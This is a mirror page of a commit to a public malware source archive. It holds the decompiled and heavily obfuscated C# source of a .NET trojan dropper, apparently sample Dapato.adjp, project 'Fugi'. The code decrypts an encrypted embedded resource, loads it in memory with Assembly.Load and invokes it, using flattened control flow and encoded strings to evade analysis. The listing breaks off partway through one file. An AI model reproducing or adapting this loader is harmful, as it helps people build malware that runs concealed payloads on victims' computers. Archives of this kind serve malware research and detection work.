daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-16 15:59:24 +00:00
Code Issues Projects Releases Wiki Activity

auto-decompiled msil via petikvx

Browse Source 
add
This commit is contained in:
vxunderground
2022-08-18 06:28:56 -05:00
parent 26192f771b
commit f2ac1ece55
12767 changed files with 1945075 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46/300f404b02f9fcce
BIN
View File
Binary file not shown.
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46/AssemblyInfo.cs
+5
View File
@@ -0,0 +1,5 @@
using System.Reflection;
using System.Runtime.CompilerServices;
[assembly: SuppressIldasm]
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46/Fugi/My/Resources/Resources.cs
+113
View File
@@ -0,0 +1,113 @@
// Decompiled with JetBrains decompiler
// Type: Fugi.My.Resources.Resources
// Assembly: Fugi, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BEDD3B0B-7024-4DCA-82E7-4DC806657EA8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Globalization;
using System.Resources;
using System.Runtime.CompilerServices;
namespace Fugi.My.Resources
{
[HideModuleName]
[CompilerGenerated]
[DebuggerNonUserCode]
[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")]
[StandardModule]
internal sealed class Resources
{
private static ResourceManager a;
private static CultureInfo b;
static Resources() => global::b.a();
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static ResourceManager a
{
get
{
if ((!r.a((object) Fugi.My.Resources.Resources.a, (object) null) ? 1 : 0) == 0)
{
label_9:
int num1 = 1151871607;
int num2 = 974585617;
label_2:
ResourceManager resourceManager;
while (true)
{
num2 ^= 976140357;
switch (num2)
{
case 3688273:
switch (num1)
{
case 3729574:
resourceManager = u.a(e.a("\uEFAB\uEF98\uEF8A\uEF84\uEFC3\uEFBF\uEF88\uEF9E\uEF82\uEF98\uEF9F\uEF8E\uEF88\uEF9E", 61349), t.a((object) s.a(__typeref (Fugi.My.Resources.Resources))));
num1 = 1151871609;
goto label_1;
case 3729575:
RuntimeMethodHandle runtimeMethodHandle1 = __methodref (Fugi.My.Resources.Resources.get_a);
num1 = 1151871606;
goto label_1;
case 3729576:
goto label_13;
default:
goto label_6;
}
case 3688274:
goto label_9;
case 3688275:
RuntimeMethodHandle runtimeMethodHandle2 = __methodref (Fugi.My.Resources.Resources.get_a);
num2 = 974585622;
continue;
case 3688276:
label_1:
num1 ^= 1150337745;
break;
}
num2 = 974585620;
}
label_6:
int num3 = -1236333641;
while (true)
{
switch ((num3 ^ 1238154915) + 8145645)
{
case 0:
RuntimeMethodHandle runtimeMethodHandle = __methodref (Fugi.My.Resources.Resources.get_a);
num3 = -1236333648;
continue;
case 1:
num2 = 974585623;
num3 = -1236333642;
continue;
case 2:
goto label_2;
default:
goto label_6;
}
}
label_13:
Fugi.My.Resources.Resources.a = resourceManager;
}
return Fugi.My.Resources.Resources.a;
}
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static CultureInfo a
{
get => Fugi.My.Resources.Resources.b;
set => Fugi.My.Resources.Resources.b = value;
}
internal static byte[] a => (byte[]) w.a(v.a((object) Fugi.My.Resources.Resources.a, e.a("\uE0A3\uE097\uE0AA\uE082\uE082", 57514), Fugi.My.Resources.Resources.b));
}
}
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46/Fugi/a.cs
+22
View File
@@ -0,0 +1,22 @@
// Decompiled with JetBrains decompiler
// Type: Fugi.a
// Assembly: Fugi, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BEDD3B0B-7024-4DCA-82E7-4DC806657EA8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46.exe
using Microsoft.VisualBasic.CompilerServices;
using System;
namespace Fugi
{
[StandardModule]
internal sealed class a
{
static a() => b.a();
public static void a() => q.a((object) p.a((object) o.a((object) n.a((object) m.a(), Fugi.My.Resources.Resources.a), e.a("\uECA2\uEC96\uECAB\uEC83\uEC83\uECC1\uECAC\uEC83\uEC8E\uEC9C\uEC9C\uECDE", 60557)), e.a("\uE8AA\uE886\uE88E\uE889", 59621)), (object) null, new object[c.a(0)]);
[STAThread]
public static void Main() => Fugi.a.a();
}
}
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46/Trojan-Dropper.Win32.Dapato.adjp.csproj
+77
View File
@@ -0,0 +1,77 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{CFFCB1B3-6C4B-402D-9DB3-6228783B1F22}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>Fugi</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
</ItemGroup>
<ItemGroup>
<Compile Include="aa.cs" />
<Compile Include="ab.cs" />
<Compile Include="ac.cs" />
<Compile Include="ad.cs" />
<Compile Include="ae.cs" />
<Compile Include="af.cs" />
<Compile Include="ag.cs" />
<Compile Include="ah.cs" />
<Compile Include="b.cs" />
<Compile Include="c.cs" />
<Compile Include="d.cs" />
<Compile Include="e.cs" />
<Compile Include="f.cs" />
<Compile Include="g.cs" />
<Compile Include="h.cs" />
<Compile Include="i.cs" />
<Compile Include="j.cs" />
<Compile Include="k.cs" />
<Compile Include="l.cs" />
<Compile Include="m.cs" />
<Compile Include="n.cs" />
<Compile Include="o.cs" />
<Compile Include="p.cs" />
<Compile Include="q.cs" />
<Compile Include="r.cs" />
<Compile Include="s.cs" />
<Compile Include="t.cs" />
<Compile Include="u.cs" />
<Compile Include="v.cs" />
<Compile Include="w.cs" />
<Compile Include="x.cs" />
<Compile Include="y.cs" />
<Compile Include="z.cs" />
<Compile Include="Fugi\a.cs" />
<Compile Include="Fugi\My\Resources\Resources.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="300f404b02f9fcce" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46/Trojan-Dropper.Win32.Dapato.adjp.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Fugi", "Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46.csproj", "{CFFCB1B3-6C4B-402D-9DB3-6228783B1F22}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{CFFCB1B3-6C4B-402D-9DB3-6228783B1F22}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{CFFCB1B3-6C4B-402D-9DB3-6228783B1F22}.Debug|Any CPU.Build.0 = Debug|Any CPU
{CFFCB1B3-6C4B-402D-9DB3-6228783B1F22}.Release|Any CPU.ActiveCfg = Release|Any CPU
{CFFCB1B3-6C4B-402D-9DB3-6228783B1F22}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46/aa.cs
+7
View File
@@ -0,0 +1,7 @@
// Decompiled with JetBrains decompiler
// Type: aa
// Assembly: Fugi, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BEDD3B0B-7024-4DCA-82E7-4DC806657EA8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46.exe
internal delegate int aa(object _param1);
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46/ab.cs
+7
View File
@@ -0,0 +1,7 @@
// Decompiled with JetBrains decompiler
// Type: ab
// Assembly: Fugi, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BEDD3B0B-7024-4DCA-82E7-4DC806657EA8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46.exe
internal delegate long ab(object _param1);
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46/ac.cs
+7
View File
@@ -0,0 +1,7 @@
// Decompiled with JetBrains decompiler
// Type: ac
// Assembly: Fugi, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BEDD3B0B-7024-4DCA-82E7-4DC806657EA8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46.exe
internal delegate float ac(object _param1);
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46/ad.cs
+7
View File
@@ -0,0 +1,7 @@
// Decompiled with JetBrains decompiler
// Type: ad
// Assembly: Fugi, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BEDD3B0B-7024-4DCA-82E7-4DC806657EA8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46.exe
internal delegate double ad(object _param1);
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46/ae.cs
+7
View File
@@ -0,0 +1,7 @@
// Decompiled with JetBrains decompiler
// Type: ae
// Assembly: Fugi, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BEDD3B0B-7024-4DCA-82E7-4DC806657EA8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46.exe
internal delegate string ae(string _param1);
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46/af.cs
+7
View File
@@ -0,0 +1,7 @@
// Decompiled with JetBrains decompiler
// Type: af
// Assembly: Fugi, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BEDD3B0B-7024-4DCA-82E7-4DC806657EA8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46.exe
internal delegate int af(object _param1);
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46/ag.cs
+7
View File
@@ -0,0 +1,7 @@
// Decompiled with JetBrains decompiler
// Type: ag
// Assembly: Fugi, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BEDD3B0B-7024-4DCA-82E7-4DC806657EA8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46.exe
internal delegate char[] ag(object _param1);
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46/ah.cs
+7
View File
@@ -0,0 +1,7 @@
// Decompiled with JetBrains decompiler
// Type: ah
// Assembly: Fugi, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BEDD3B0B-7024-4DCA-82E7-4DC806657EA8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46.exe
internal delegate string ah(char[] _param1);
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46/b.cs
+790
View File
@@ -0,0 +1,790 @@
// Decompiled with JetBrains decompiler
// Type: b
// Assembly: Fugi, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BEDD3B0B-7024-4DCA-82E7-4DC806657EA8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46.exe
using System;
using System.IO;
using System.Reflection;
using System.Threading;
internal sealed class b
{
private static Assembly a;
private static object b = new object();
private static int c;
private static string[] d;
public static void a()
{
if ((((global::b.c == 0 ? 1 : 0) != 0 ? 0 : 1) == 0 ? 0 : 1) != 0)
return;
try
{
Monitor.Enter(global::b.b);
if (((global::b.c == 0 ? 1 : 0) != 0 ? 0 : 1) != 0)
return;
label_34:
int num1 = -226195680;
int num2 = -561798657;
label_3:
while (true)
{
num2 ^= 555203725;
label_26:
int num3 = 968784119;
int num4 = -376123481;
label_5:
while (true)
{
num4 ^= 370221929;
label_22:
int num5 = 169643759;
int num6 = 618844569;
label_7:
while (true)
{
num6 ^= 619897780;
label_12:
int num7 = -1011984020;
int num8 = 574885163;
while (true)
{
switch (num8 ^ 575736408)
{
case 1378160:
// ISSUE: method reference
RuntimeMethodHandle runtimeMethodHandle1 = __methodref (global::b.get_a);
num8 = 574885160;
continue;
case 1378161:
goto label_12;
case 1378162:
switch (num7 + 5847024)
{
case 0:
// ISSUE: method reference
RuntimeMethodHandle runtimeMethodHandle2 = __methodref (global::b.get_a);
num7 = -1011984018;
goto label_8;
case 1:
label_16:
num6 = 618844575;
num7 = -1011984019;
goto label_8;
case 2:
switch (num6)
{
case 1061418:
goto label_19;
case 1061419:
switch (num5)
{
case 2909411:
label_23:
num4 = -376123484;
num5 = 169643758;
goto label_6;
case 2909412:
switch (num4 + 8000308)
{
case 0:
goto label_26;
case 1:
switch (num3)
{
case 1949493:
label_29:
num2 = -561798659;
num3 = 968784118;
goto label_4;
case 1949494:
switch (num2 + 7070352)
{
case 0:
switch (num1 + 5290868)
{
case 0:
AppDomain.CurrentDomain.ResourceResolve += new ResolveEventHandler(global::b.a);
num1 = -226195679;
goto label_2;
case 1:
goto label_37;
default:
goto label_33;
}
case 1:
goto label_34;
case 2:
label_2:
num1 ^= 220971948;
goto label_29;
default:
num3 = 968784116;
goto label_4;
}
case 1949495:
goto label_3;
default:
goto label_28;
}
case 2:
label_4:
num3 ^= 967034817;
goto label_23;
default:
num5 = 169643752;
goto label_6;
}
case 2909413:
goto label_5;
default:
goto label_21;
}
case 1061420:
goto label_22;
case 1061421:
label_6:
num5 ^= 170977803;
goto label_16;
default:
num7 = -1011984017;
goto label_8;
}
case 3:
goto label_7;
default:
num8 = 574885161;
continue;
}
case 1378163:
label_8:
num7 ^= 1007194494;
break;
}
num8 = 574885162;
}
label_19:
// ISSUE: method reference
RuntimeMethodHandle runtimeMethodHandle = __methodref (global::b.a);
num6 = 618844574;
continue;
label_21:
num6 = 618844568;
}
label_28:
num4 = -376123483;
}
label_33:
num2 = -561798660;
}
label_37:
global::b.c = 1;
}
finally
{
Monitor.Exit(global::b.b);
}
}
public static string a => "300f404b02f9fcce";
public static Assembly a(object a1, ResolveEventArgs a2)
{
if (((global::b.d == null ? 0 : 1) == 0 ? 0 : 1) == 0)
{
try
{
Monitor.Enter(global::b.b);
if (((global::b.d == null ? 0 : 1) == 0 ? 0 : 1) == 0)
{
label_30:
int num1 = 1319863694;
int num2 = -1247360233;
label_3:
Stream manifestResourceStream;
while (true)
{
num2 ^= 1242423639;
label_7:
int num3 = 1536961512;
int num4 = -942752411;
while (true)
{
do
{
switch ((num4 ^ 946906395) + 4319108)
{
case 0:
goto label_7;
case 1:
switch (num3)
{
case 2222797:
label_10:
num2 = -1247360152;
num3 = 1536961513;
goto label_4;
case 2222798:
switch (num2 + 5559746)
{
case 0:
goto label_30;
case 1:
switch (num1)
{
case 3571212:
manifestResourceStream = typeof (global::b).Assembly.GetManifestResourceStream(global::b.a);
num1 = 1319863695;
goto label_2;
case 3571213:
if (manifestResourceStream != null)
{
num1 = 1319863692;
goto label_2;
}
else
goto label_37;
case 3571214:
goto label_36;
default:
goto label_32;
}
case 2:
label_2:
num1 ^= 1318976386;
goto label_10;
default:
label_27:
int num5 = 357788384;
int num6 = -755162327;
label_13:
while (true)
{
num6 ^= 759887395;
label_17:
int num7 = -656391765;
int num8 = 826200064;
while (true)
{
switch (num8 ^ 824727794)
{
case 1476847:
goto label_17;
case 1476848:
switch (num7 + 5426554)
{
case 0:
switch (num6 + 4729593)
{
case 0:
switch (num5)
{
case 1693911:
num3 = 1536961515;
num5 = 357788399;
goto label_12;
case 1693912:
goto label_4;
default:
goto label_26;
}
case 1:
goto label_27;
case 2:
goto label_28;
case 3:
label_12:
num5 ^= 357216823;
goto label_23;
default:
num7 = -656391766;
goto label_14;
}
case 1:
label_23:
num6 = -755162332;
num7 = -656391772;
goto label_14;
case 2:
// ISSUE: method reference
RuntimeMethodHandle runtimeMethodHandle1 = __methodref (global::b.a);
num7 = -656391771;
goto label_14;
case 3:
goto label_13;
default:
num8 = 826200093;
continue;
}
case 1476849:
// ISSUE: method reference
RuntimeMethodHandle runtimeMethodHandle2 = __methodref (global::b.a);
num8 = 826200067;
continue;
case 1476850:
label_14:
num7 ^= 659387181;
break;
}
num8 = 826200066;
}
label_26:
num6 = -755162325;
continue;
label_28:
// ISSUE: method reference
RuntimeMethodHandle runtimeMethodHandle = __methodref (global::b.a);
num6 = -755162326;
}
}
case 2222799:
goto label_3;
default:
goto label_9;
}
case 2:
label_4:
num3 ^= 1539162406;
break;
}
num4 = -942752410;
}
while ((num4 == 0 ? 0 : 1) != 0);
goto label_7;
label_9:
num4 = -942752409;
}
label_32:
num2 = -1247360151;
}
label_36:
int num9 = 0;
goto label_38;
label_37:
num9 = 1;
label_38:
if (num9 == 0)
global::b.a = global::b.a(manifestResourceStream);
}
}
finally
{
Monitor.Exit(global::b.b);
}
}
return (!global::b.a(a2.Name) ? 1 : 0) == 0 ? global::b.a : (Assembly) null;
}
private static Assembly a(Stream a)
{
MemoryStream input = l.a(a);
BinaryReader binaryReader = new BinaryReader((Stream) input);
label_2:
int num1 = -976949257;
if ((num1 == 0 ? 0 : 1) == 0)
goto label_3;
label_1:
int index;
while (true)
{
switch ((num1 ^ 979141528) + 6787986)
{
case 0:
goto label_3;
case 1:
goto label_4;
case 2:
index = 0;
num1 = -976949271;
continue;
case 3:
if (index != 0)
{
num1 = -976949270;
continue;
}
goto label_9;
case 4:
goto label_8;
default:
goto label_2;
}
}
label_8:
int num2 = 0;
goto label_10;
label_9:
num2 = 1;
label_10:
if (num2 != 0)
goto label_12;
label_11:
string[] strArray;
strArray[index] = binaryReader.ReadString();
++index;
label_12:
int length;
if ((index >= length ? 0 : 1) == 0)
{
global::b.d = strArray;
label_40:
int num3 = -143477510;
int num4 = -1430655755;
label_15:
byte[] numArray;
while (true)
{
num4 ^= 1426872453;
label_34:
int num5 = -80790779;
int num6 = -1051659499;
label_17:
while (true)
{
num6 ^= 1053901982;
label_28:
int num7 = -1233384020;
int num8 = -1443278188;
label_19:
while (true)
{
num8 ^= 1450976975;
label_21:
int num9 = -1122975311;
while (true)
{
switch ((num9 ^ 1116959030) + 8146810)
{
case 0:
// ISSUE: method reference
RuntimeMethodHandle runtimeMethodHandle1 = __methodref (global::b.a);
num9 = -1122975312;
continue;
case 1:
switch (num8 + 8031144)
{
case 0:
switch (num7 + 4983814)
{
case 0:
label_30:
num6 = -1051659500;
num7 = -1233384019;
goto label_18;
case 1:
// ISSUE: method reference
RuntimeMethodHandle runtimeMethodHandle2 = __methodref (global::b.a);
num7 = -1233384021;
goto label_18;
case 2:
switch (num6 + 8276087)
{
case 0:
goto label_34;
case 1:
switch (num5 + 7895701)
{
case 0:
label_37:
num4 = -1430655766;
num5 = -80790780;
goto label_16;
case 1:
switch (num4 + 4869010)
{
case 0:
goto label_40;
case 1:
int count;
switch (num3 + 4299732)
{
case 0:
numArray = new byte[count];
num3 = -143477511;
goto label_14;
case 1:
binaryReader.Read(numArray, 0, count);
num3 = -143477509;
goto label_14;
case 2:
count = (int) (input.Length - input.Position);
num3 = -143477512;
goto label_14;
case 3:
goto label_46;
default:
goto label_42;
}
case 2:
label_14:
num3 ^= 147640532;
goto label_37;
default:
num5 = -80790782;
goto label_16;
}
case 2:
goto label_15;
default:
goto label_36;
}
case 2:
label_16:
num5 ^= 78167657;
goto label_30;
default:
num7 = -1233384022;
goto label_18;
}
case 3:
goto label_17;
default:
goto label_27;
}
case 1:
goto label_28;
case 2:
goto label_29;
case 3:
label_18:
num7 ^= 1238367824;
goto label_25;
default:
num9 = -1122975298;
continue;
}
case 2:
label_25:
num8 = -1443278185;
num9 = -1122975297;
continue;
case 3:
goto label_19;
default:
goto label_21;
}
}
label_27:
num8 = -1443278186;
continue;
label_29:
// ISSUE: method reference
RuntimeMethodHandle runtimeMethodHandle3 = __methodref (global::b.a);
num8 = -1443278187;
}
label_36:
num6 = -1051659497;
}
label_42:
num4 = -1430655765;
}
label_46:
return Assembly.Load(numArray);
}
goto label_11;
label_3:
strArray = new string[length];
num1 = -976949272;
if ((num1 == 0 ? 0 : 1) != 0)
goto label_1;
label_4:
length = binaryReader.ReadInt32();
num1 = -976949258;
goto label_1;
}
private static bool a(string a)
{
if (((global::b.d == null ? 1 : 0) == 0 ? 0 : 1) == 0)
{
label_6:
int num1 = 1477415917;
int num2 = 601725783;
int index;
string[] d;
while (true)
{
switch (num2 ^ 602759493)
{
case 3209744:
switch (num1)
{
case 3757452:
if (index != 0)
{
num1 = 1477415916;
goto label_1;
}
else
goto label_12;
case 3757453:
index = 0;
num1 = 1477415919;
goto label_1;
case 3757454:
d = global::b.d;
num1 = 1477415918;
goto label_1;
case 3757455:
goto label_11;
default:
num2 = 601725780;
continue;
}
case 3209745:
goto label_6;
case 3209746:
label_1:
num1 ^= 1479984739;
goto default;
default:
num2 = 601725781;
if ((num2 == 0 ? 0 : 1) != 0)
continue;
goto case 3209744;
}
}
label_11:
int num3 = 0;
goto label_13;
label_12:
num3 = 1;
label_13:
if (num3 != 0)
goto label_42;
label_14:
string str = d[index];
if ((!a.Equals(str) ? 1 : 0) == 0)
{
label_37:
int num4 = -311275153;
int num5 = 878119074;
label_16:
bool flag;
while (true)
{
num5 ^= 880632524;
label_31:
int num6 = -433645422;
int num7 = -1229873183;
label_18:
while (true)
{
num7 ^= 1226414648;
label_24:
int num8 = 1261558068;
int num9 = 603637658;
while (true)
{
switch (num9 ^ 600591507)
{
case 3574534:
switch (num8)
{
case 2014848:
label_26:
num7 = -1229873184;
num8 = 1261558069;
goto label_19;
case 2014849:
// ISSUE: method reference
RuntimeMethodHandle runtimeMethodHandle1 = __methodref (global::b.a);
num8 = 1261558071;
goto label_19;
case 2014850:
switch (num7 + 5765674)
{
case 0:
goto label_30;
case 1:
goto label_31;
case 2:
switch (num6 + 7008665)
{
case 0:
label_34:
num5 = 878119073;
num6 = -433645421;
goto label_17;
case 1:
switch (num5)
{
case 2779756:
goto label_37;
case 2779757:
switch (num4 + 4671099)
{
case 0:
flag = true;
num4 = -311275156;
goto label_15;
case 1:
goto label_44;
default:
goto label_39;
}
case 2779758:
label_15:
num4 ^= 315287786;
goto label_34;
default:
num6 = -433645411;
goto label_17;
}
case 2:
goto label_16;
default:
goto label_33;
}
case 3:
label_17:
num6 ^= 431101690;
goto label_26;
default:
num8 = 1261558070;
goto label_19;
}
case 2014851:
goto label_18;
default:
num9 = 603637652;
continue;
}
case 3574535:
goto label_24;
case 3574536:
// ISSUE: method reference
RuntimeMethodHandle runtimeMethodHandle2 = __methodref (global::b.get_a);
num9 = 603637659;
continue;
case 3574537:
label_19:
num8 ^= 1261397942;
break;
}
num9 = 603637653;
}
label_30:
// ISSUE: method reference
RuntimeMethodHandle runtimeMethodHandle = __methodref (global::b.a);
num7 = -1229873170;
continue;
label_33:
num7 = -1229873169;
}
label_39:
num5 = 878119072;
}
label_44:
return flag;
}
++index;
label_42:
if ((index >= d.Length ? 0 : 1) != 0)
goto label_14;
}
return false;
}
}
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46/c.cs
+254
View File
@@ -0,0 +1,254 @@
// Decompiled with JetBrains decompiler
// Type: c
// Assembly: Fugi, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BEDD3B0B-7024-4DCA-82E7-4DC806657EA8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46.exe
using System;
using System.IO;
using System.Runtime.Serialization.Formatters.Binary;
internal sealed class c
{
public static int a(int a) => c.a.a.b[a];
public static long a(int a) => c.a.a.c[a];
public static float a(int a) => c.a.a.d[a];
public static double a(int a) => c.a.a.e[a];
public static Array a(byte[] a)
{
MemoryStream a1 = new MemoryStream(a);
label_10:
int num1 = -515919758;
int num2 = -1015581650;
label_2:
num2 ^= 1019401914;
int num3;
int num4;
switch (num2 + 4873581)
{
case 0:
goto label_10;
case 1:
BinaryFormatter binaryFormatter;
while (true)
{
num1 ^= 512422144;
switch (num1 + 4898446)
{
case 0:
binaryFormatter = new BinaryFormatter();
num1 = -515919757;
continue;
case 1:
goto label_12;
default:
goto label_9;
}
}
label_12:
MemoryStream serializationStream = l.a((Stream) a1);
try
{
return (Array) binaryFormatter.Deserialize((Stream) serializationStream);
}
finally
{
if ((serializationStream == null ? 1 : 0) == 0)
serializationStream.Dispose();
}
default:
label_8:
num3 = 1253577736;
num4 = 768216154;
goto label_4;
}
label_3:
num3 ^= 1249911885;
switch (num3)
{
case 3682373:
goto label_9;
case 3682374:
goto label_2;
default:
goto label_7;
}
label_4:
num4 ^= 771679989;
switch (num4)
{
case 3467950:
goto label_8;
case 3467951:
goto label_3;
default:
goto label_6;
}
label_5:
int num5;
switch (num5 ^ 468325142)
{
case 3919889:
goto label_7;
case 3919890:
goto label_4;
}
label_6:
num5 = 466731783;
goto label_5;
label_7:
num4 = 768216155;
num5 = 466731780;
goto label_5;
label_9:
num2 = -1015581655;
num3 = 1253577739;
goto label_3;
}
public static string a => e.a("\uEDC5\uEDCF\uEDC6\uED92\uEDC0\uED95\uED95\uEDC0\uEDC3\uED91\uEDC4\uED96\uED92\uEDC7\uED91\uEDC4", 60791);
private sealed class a
{
